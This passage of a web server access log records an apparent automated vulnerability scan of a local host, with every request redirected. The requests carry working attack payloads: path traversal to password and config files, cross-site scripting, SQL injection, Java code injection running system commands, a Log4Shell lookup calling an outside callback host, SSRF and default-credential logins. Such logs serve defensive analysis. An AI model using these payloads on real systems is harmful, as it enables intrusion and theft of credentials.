HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.367","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.601","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.415","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /glpi/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.375","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.802","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"{\x22query\x22:\x22# Welcome to GraphiQL\x5Cn#\x5Cn# GraphiQL is an in-browser tool for writing, validating, and\x5Cn# testing GraphQL queries.\x5Cn#\x5Cn# Type queries into this side of the screen, and you will see intelligent\x5Cn# typeaheads aware of the current GraphQL type schema and live syntax and\x5Cn# validation errors highlighted within the text.\x5Cn#\x5Cn# GraphQL queries typically start with a \x5C\x22{\x5C\x22 character. Lines that starts\x5Cn# with a # are ignored.\x5Cn#\x5Cn# An example GraphQL query might look like:\x5Cn#\x5Cn# {\x5Cn# field(arg: \x5C\x22value\x5C\x22) {\x5Cn# subField\x5Cn# }\x5Cn# }\x5Cn#\x5Cn# Keyboard shortcuts:\x5Cn#\x5Cn# Prettify Query: Shift-Ctrl-P (or press the prettify button above)\x5Cn#\x5Cn# Run Query: Ctrl-Enter (or press the play button above)\x5Cn#\x5Cn# Auto Complete: Ctrl-Space (or just start typing)\x5Cn#\x5Cn\x5Cn{\x5Cn users {\x5Cn nodes {\x5Cn id\x5Cn name\x5Cn username\x5Cn }\x5Cn }\x5Cn}\x22,\x22variables\x22:null,\x22operationName\x22:null}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/graphql HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.404","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/-/graphql-explorer", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"UPusername=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E&UPpassword=%22%3E%3Cscript%3Ejavascript%3Aalert%28document.cookie%29%3C%2Fscript%3E","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /MUP/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.324","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"127.0.0.1/MUP", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.363","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.364","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.287","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.338","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"username=admin&password=geoserver","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.246","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.323","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.471","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:23 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.329","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /pandora_console/attachment/pandora_chat.log.json.txt HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.253","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.266","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.293","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.366","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat+%2Fetc%2Fpasswd')]=nuclei","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.297","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.372","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /include/downmix.inc.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.722","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiLCp3VzZXJuYW1lwqcifX0=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.346","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /blog/wp-content/plugins/1-flash-gallery/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.280","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.436","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"{\x22username\x22:\x22user\x22,\x22password\x22:\x22pass\x22,\x22remember\x22:\x22${jndi:ldap://${hostName}.c9oms3gsmpve1ijt0mc0gogdm5w53t9on.oast.live}\x22,\x22strict\x22:true}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.282","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1/manage/account/login?redirect=%2Fmanage", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.302","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.336","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.382","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.396","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type+C%3A%2FWindows%2Fwin.ini')]=nuclei","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /account HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.357","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"errorpage=/etc/passwd&obj-action=auth&:action=login","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cgi-bin/webproc HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.343","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.284","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/icf/logoff?redirecturl=https://example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /runningpods/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.333","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.github/workflows/CI.yml HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"{\x22grant_type\x22:\x22password\x22,\x22username\x22:\x22root\x22,\x22password\x22:\x225iveL!fe\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.402","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.449","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.440","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.384","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.723","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.801","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:24 